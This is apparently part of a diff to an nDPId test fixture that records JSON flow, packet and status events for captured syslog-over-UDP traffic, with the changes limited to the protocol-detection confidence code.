00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":32,"source":"syslog.pcap","alias":"nDPId-test","packets-captured":32,"packets-processed":29,"total-skipped-flows":0,"total-l4-payload-len":5976,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":1,"current-active-flows":2,"total-active-flows":6,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":41,"global_ts_msec":1600781689297} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"syslog.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781689297,"flow_last_seen":1600781689297,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1600781689297,"l3_proto":"ip4","src_ip":"172.21.251.36","dst_ip":"172.19.196.11","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"syslog.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1600781689297,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":124,"pkt_l4_len":90,"thread_ts_msec":1600781689297,"pkt":"qrvMbk9eqrvMlgwFCABFAABuAAAAAP8RpCWsFfskrBPEC\/TXAgIAWrkePDE4OT4zMDogKlNlcCAyMiAxMzozNDo0OS4xOTU6ICVTWVMtNS1DT05GSUdfSTogQ29uZmlndXJlZCBmcm9tIGNvbnNvbGUgYnkgY29uc29sZQ=="} 
-00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"syslog.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781689297,"flow_last_seen":1600781689297,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1600781689297,"l3_proto":"ip4","src_ip":"172.21.251.36","dst_ip":"172.19.196.11","src_port":62679,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"syslog.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781689297,"flow_last_seen":1600781689297,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1600781689297,"l3_proto":"ip4","src_ip":"172.21.251.36","dst_ip":"172.19.196.11","src_port":62679,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00595{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"syslog.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1600781690282,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":160,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":160,"pkt_l4_len":126,"thread_ts_msec":1600781690282,"pkt":"qrvMbk9eqrvMlgwFCABFAACSAAEAAP8RpACsFfskrBPEC\/TXAgIAfpjBPDE5MD4zMTogKlNlcCAyMiAxMzozNDo0OS4yMjA6ICVTWVMtNi1MT0dHSU5HSE9TVF9TVEFSVFNUT1A6IExvZ2dpbmcgdG8gaG9zdCAxMC4xLjIuMiBwb3J0IDUxNCBzdGFydGVkIC0gQ0xJIGluaXRpYXRlZA=="} 
00564{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":34,"source":"syslog.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1557406267510,"flow_last_seen":1557406279497,"flow_idle_time":620000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":1395,"flow_avg_l4_payload_len":465,"midstream":0,"thread_ts_msec":1600781690282,"l3_proto":"ip4","src_ip":"216.66.80.30","dst_ip":"193.24.227.12","l4_proto":41,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00549{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"syslog.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1557406267510,"flow_last_seen":1557406279497,"flow_idle_time":620000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":1395,"flow_avg_l4_payload_len":465,"midstream":0,"thread_ts_msec":1600781690282,"l3_proto":"ip4","src_ip":"216.66.80.30","dst_ip":"193.24.227.12","l4_proto":41,"flow_datalink":1,"flow_max_packets":3} 
@@ -49,61 +49,61 @@ 00550{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"syslog.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1557406267494,"flow_last_seen":1557406279481,"flow_idle_time":620000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":1395,"flow_avg_l4_payload_len":465,"midstream":0,"thread_ts_msec":1600781690282,"l3_proto":"ip4","src_ip":"193.24.227.10","dst_ip":"216.66.86.114","l4_proto":41,"flow_datalink":1,"flow_max_packets":3} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"syslog.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781776117,"flow_last_seen":1600781776117,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1600781776117,"l3_proto":"ip4","src_ip":"192.168.72.140","dst_ip":"192.168.178.148","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"syslog.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1600781776117,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":158,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":158,"pkt_l4_len":124,"thread_ts_msec":1600781776117,"pkt":"qrvMXnUpqrvMO4StCABFAACQAAMAAP8RPujAqEiMwKiylPTXAgIAfAzhPDE0PjMzOiAqU2VwIDIyIDEzOjM2OjE1LjMwODogJVNZUy02LUxPR0dJTkdIT1NUX1NUQVJUU1RPUDogTG9nZ2luZyB0byBob3N0IDEwLjEuMi4yIHBvcnQgNTE0IHJlc3RvcmVkIENMSSBpbml0aWF0ZWQ="} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"syslog.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781776117,"flow_last_seen":1600781776117,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1600781776117,"l3_proto":"ip4","src_ip":"192.168.72.140","dst_ip":"192.168.178.148","src_port":62679,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"syslog.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781776117,"flow_last_seen":1600781776117,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1600781776117,"l3_proto":"ip4","src_ip":"192.168.72.140","dst_ip":"192.168.178.148","src_port":62679,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"syslog.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1600781777157,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":1600781777157,"pkt":"qrvMXnUpqrvMO4StCABFAABtAAQAAP8RPwrAqEiMwKiylPTXAgIAWZ\/\/PDEzPjM0OiAqU2VwIDIyIDEzOjM2OjE2LjA5MTogJVNZUy01LUNPTkZJR19JOiBDb25maWd1cmVkIGZyb20gY29uc29sZSBieSBjb25zb2xl"} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"syslog.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781952293,"flow_last_seen":1600781952293,"flow_idle_time":200000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":93,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1600781952293,"l3_proto":"ip4","src_ip":"192.168.67.241","dst_ip":"10.193.53.6","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00558{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"syslog.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1600781952293,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"thread_ts_msec":1600781952293,"pkt":"qrvMySBnqrvMPDqhCABFAAB5AAgAAP8RdwvAqEPxCsE1BvTXAgIAZVTQPDE4Nz4zODogUjE6ICpTZXAgMjIgMTM6Mzk6MTEuMjUwOiAlTElOSy0zLVVQRE9XTjogSW50ZXJmYWNlIEV0aGVybmV0MC8yLCBjaGFuZ2VkIHN0YXRlIHRvIHVw"} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"syslog.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781952293,"flow_last_seen":1600781952293,"flow_idle_time":200000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":93,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1600781952293,"l3_proto":"ip4","src_ip":"192.168.67.241","dst_ip":"10.193.53.6","src_port":62679,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
+00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"syslog.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781952293,"flow_last_seen":1600781952293,"flow_idle_time":200000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":93,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1600781952293,"l3_proto":"ip4","src_ip":"192.168.67.241","dst_ip":"10.193.53.6","src_port":62679,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00590{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"syslog.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1600781952293,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1600781952293,"pkt":"qrvMySBnqrvMPDqhCABFAACPAAkAAP8RdvTAqEPxCsE1BvTXAgIAe0jbPDE4OT4zOTogUjE6ICpTZXAgMjIgMTM6Mzk6MTIuMjUyOiAlTElORVBST1RPLTUtVVBET1dOOiBMaW5lIHByb3RvY29sIG9uIEludGVyZmFjZSBFdGhlcm5ldDAvMiwgY2hhbmdlZCBzdGF0ZSB0byB1cA=="} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"syslog.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600781689297,"flow_last_seen":1600781690282,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":118,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1600781952293,"l3_proto":"ip4","src_ip":"172.21.251.36","dst_ip":"172.19.196.11","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"syslog.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600781689297,"flow_last_seen":1600781690282,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":118,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1600781952293,"l3_proto":"ip4","src_ip":"172.21.251.36","dst_ip":"172.19.196.11","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":38,"source":"syslog.pcap","alias":"nDPId-test","packets-captured":38,"packets-processed":35,"total-skipped-flows":0,"total-l4-payload-len":6581,"total-not-detected-flows":2,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":1,"current-active-flows":2,"total-active-flows":9,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":59,"global_ts_msec":1600782411853} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"syslog.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782411853,"flow_last_seen":1600782411853,"flow_idle_time":200000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":0,"thread_ts_msec":1600782411853,"l3_proto":"ip4","src_ip":"192.168.126.102","dst_ip":"172.19.177.230","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"syslog.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1600782411853,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":1600782411853,"pkt":"qrvMCetCqrvMS9ZJCABFAAFMAAAAAP8RHZjAqH5mrBOx5t9OAgIBOHsYPDE5MD44MjogUjE6IFtzeXNsb2dAOSBzX3NuPSIxIl06IDxpb3MtbG9nLW1zZz48ZmFjaWxpdHk+U1lTPC9mYWNpbGl0eT48c2V2ZXJpdHk+Njwvc2V2ZXJpdHk+PG1zZy1pZD5MT0dHSU5HSE9TVF9TVEFSVFNUT1A8L21zZy1pZD48dGltZT4qU2VwIDIyIDEzOjQ2OjUwLjgxMjwvdGltZT48YXJncz48YXJnIGlkPSIwIj4xMC4xLjIuMjwvYXJnPjxhcmcgaWQ9IjEiPiBwb3J0IDUxNDwvYXJnPjxhcmcgaWQ9IjIiPjwvYXJnPjxhcmcgaWQ9IjMiPiBzdGFydGVkIC0gQ0xJIGluaXRpYXRlZDwvYXJnPjwvYXJncz48L2lvcy1sb2ctbXNnPg=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"syslog.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782411853,"flow_last_seen":1600782411853,"flow_idle_time":200000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":0,"thread_ts_msec":1600782411853,"l3_proto":"ip4","src_ip":"192.168.126.102","dst_ip":"172.19.177.230","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
-00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"syslog.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600781776117,"flow_last_seen":1600781777157,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1600782411853,"l3_proto":"ip4","src_ip":"192.168.72.140","dst_ip":"192.168.178.148","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"syslog.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600781952293,"flow_last_seen":1600781952293,"flow_idle_time":200000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1600782411853,"l3_proto":"ip4","src_ip":"192.168.67.241","dst_ip":"10.193.53.6","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"syslog.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782411853,"flow_last_seen":1600782411853,"flow_idle_time":200000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":0,"thread_ts_msec":1600782411853,"l3_proto":"ip4","src_ip":"192.168.126.102","dst_ip":"172.19.177.230","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"syslog.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600781776117,"flow_last_seen":1600781777157,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1600782411853,"l3_proto":"ip4","src_ip":"192.168.72.140","dst_ip":"192.168.178.148","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"syslog.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600781952293,"flow_last_seen":1600781952293,"flow_idle_time":200000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1600782411853,"l3_proto":"ip4","src_ip":"192.168.67.241","dst_ip":"10.193.53.6","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
00739{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"syslog.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1600782437280,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":268,"pkt_l4_len":234,"thread_ts_msec":1600782437280,"pkt":"qrvMCetCqrvMS9ZJCABFAAD+AAEAAP8RHeXAqH5mrBOx5t9OAgIA6uDbPDE4Nz44MzogUjE6IFtzeXNsb2dAOSBzX3NuPSIyIl06IDxpb3MtbG9nLW1zZz48ZmFjaWxpdHk+TElOSzwvZmFjaWxpdHk+PHNldmVyaXR5PjM8L3NldmVyaXR5Pjxtc2ctaWQ+VVBET1dOPC9tc2ctaWQ+PHRpbWU+KlNlcCAyMiAxMzo0NzoxNi40MDQ8L3RpbWU+PGFyZ3M+PGFyZyBpZD0iMCI+RXRoZXJuZXQwLzM8L2FyZz48YXJnIGlkPSIxIj51cDwvYXJnPjwvYXJncz48L2lvcy1sb2ctbXNnPg=="} 00739{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"syslog.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1600782437466,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":270,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":270,"pkt_l4_len":236,"thread_ts_msec":1600782437466,"pkt":"qrvMCetCqrvMS9ZJCABFAAEAAAIAAP8RHeLAqH5mrBOx5t9OAgIA7NFUPDE4OT44NDogUjE6IFtzeXNsb2dAOSBzX3NuPSIzIl06IDxpb3MtbG9nLW1zZz48ZmFjaWxpdHk+U1lTPC9mYWNpbGl0eT48c2V2ZXJpdHk+NTwvc2V2ZXJpdHk+PG1zZy1pZD5DT05GSUdfSTwvbXNnLWlkPjx0aW1lPipTZXAgMjIgMTM6NDc6MTcuMTk2PC90aW1lPjxhcmdzPjxhcmcgaWQ9IjAiPmNvbnNvbGU8L2FyZz48YXJnIGlkPSIxIj5jb25zb2xlPC9hcmc+PC9hcmdzPjwvaW9zLWxvZy1tc2c+"} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"syslog.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782466695,"flow_last_seen":1600782466695,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1600782466695,"l3_proto":"ip4","src_ip":"10.22.179.215","dst_ip":"172.26.54.76","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"syslog.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1600782466695,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":149,"pkt_l4_len":115,"thread_ts_msec":1600782466695,"pkt":"qrvMdK0EqrvMag4ECABFAACHAAQAAP8RGw4KFrPXrBo2TN9OAgIAcw8OPDE4OT44NTogUjE6IFtzeXNsb2dAOSBzX3NuPSI1Il06ICpTZXAgMjIgMTM6NDc6NDUuNjcyOiAlU1lTLTUtQ09ORklHX0k6IENvbmZpZ3VyZWQgZnJvbSBjb25zb2xlIGJ5IGNvbnNvbGU="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"syslog.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782466695,"flow_last_seen":1600782466695,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1600782466695,"l3_proto":"ip4","src_ip":"10.22.179.215","dst_ip":"172.26.54.76","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"syslog.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782466695,"flow_last_seen":1600782466695,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1600782466695,"l3_proto":"ip4","src_ip":"10.22.179.215","dst_ip":"172.26.54.76","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00627{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"syslog.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1600782475311,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1600782475311,"pkt":"qrvMdK0EqrvMag4ECABFAACrAAUAAP8RGukKFrPXrBo2TN9OAgIAl+OwPDE5MD44NjogUjE6IFtzeXNsb2dAOSBzX3NuPSI2Il06ICpTZXAgMjIgMTM6NDc6NTQuMzAzOiAlU1lTLTYtTE9HR0lOR0hPU1RfU1RBUlRTVE9QOiBMb2dnaW5nIHRvIGhvc3QgMTAuMS4yLjIgcG9ydCA1MTQgc3RvcHBlZCAtIENMSSBpbml0aWF0ZWQ="} 00627{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"syslog.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1600782476392,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":184,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":184,"pkt_l4_len":150,"thread_ts_msec":1600782476392,"pkt":"qrvMdK0EqrvMag4ECABFAACqAAYAAP8RGukKFrPXrBo2TN9OAgIAlm33PDE5MD44NzogUjE6IFtzeXNsb2dAOSBzX3NuPSI3Il06ICpTZXAgMjIgMTM6NDc6NTUuNjk5OiAlU1lTLTYtTE9HR0lOR0hPU1RfU1RBUlRTVE9QOiBMb2dnaW5nIHRvIGhvc3QgMTAuMS4yLjIgcG9ydCA1MTQgcmVzdG9yZWQgQ0xJIGluaXRpYXRlZA=="} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"syslog.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782514222,"flow_last_seen":1600782514222,"flow_idle_time":200000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1600782514222,"l3_proto":"ip4","src_ip":"192.168.45.162","dst_ip":"10.208.120.95","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00712{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"syslog.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1600782514222,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":249,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":249,"pkt_l4_len":215,"thread_ts_msec":1600782514222,"pkt":"qrvMkvyHqrvMTZFeCABFAADrAAkAAP8RSX\/AqC2iCtB4X99OAgIA1wa4PDE4OT45MjogUjE6IDxpb3MtbG9nLW1zZz48ZmFjaWxpdHk+U1lTPC9mYWNpbGl0eT48c2V2ZXJpdHk+NTwvc2V2ZXJpdHk+PG1zZy1pZD5DT05GSUdfSTwvbXNnLWlkPjx0aW1lPipTZXAgMjIgMTM6NDg6MzMuOTc4PC90aW1lPjxhcmdzPjxhcmcgaWQ9IjAiPmNvbnNvbGU8L2FyZz48YXJnIGlkPSIxIj5jb25zb2xlPC9hcmc+PC9hcmdzPjwvaW9zLWxvZy1tc2c+"} 